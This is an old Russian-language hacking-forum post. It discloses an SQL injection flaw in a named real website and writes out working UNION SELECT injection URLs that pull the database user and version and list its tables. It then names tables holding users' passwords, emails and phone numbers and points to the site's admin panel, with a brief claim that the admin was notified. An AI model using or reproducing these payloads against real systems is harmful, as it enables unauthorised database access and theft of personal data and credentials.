02.05.2007, 19:45
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
С нами:
10041506
Репутация:
572
|
|
sql-inj
Мужики - зацените:
www.rudn-kvn.ru одна из моих любимых команд КВН )
уязвимость: http://rudn-kvn.ru/gastroli.shtml?ul=10&uld=78'
кавычку оставляем, смотрим версию -
http://rudn-kvn.ru/gastroli.shtml?ul=10&uld=-78'+union+select+1,2,aes_decrypt(aes_encrypt(conca t_ws(0x3a,user(),version(),database()),0x55),0x55) ,4,5/*
пятерка!  смотрим таблицы:
http://rudn-kvn.ru/gastroli.shtml?ul=10&uld=-78'+union+select+1,2,aes_decrypt(aes_encrypt(conca t_ws(0x3a,table_name),0x55),0x55),4,5+from+informa tion_schema.tables+limit+20,1/*
интересные таблицы и некоторые поля к ним: banner_users (register,userpass,username,id) ,konkurs_user(tel,city,country,email,name,passwd,user_id), sde_register_users(icq,tel,post,name,email,passwd,login,user_id)
Таблиц под 50, есть и интересные.
Есть форум
Есть админка
http://rudn-kvn.ru/admin/
ps.отправил багрепорт админу.
Последний раз редактировалось Серенький; 02.05.2007 в 21:23..
|
|
|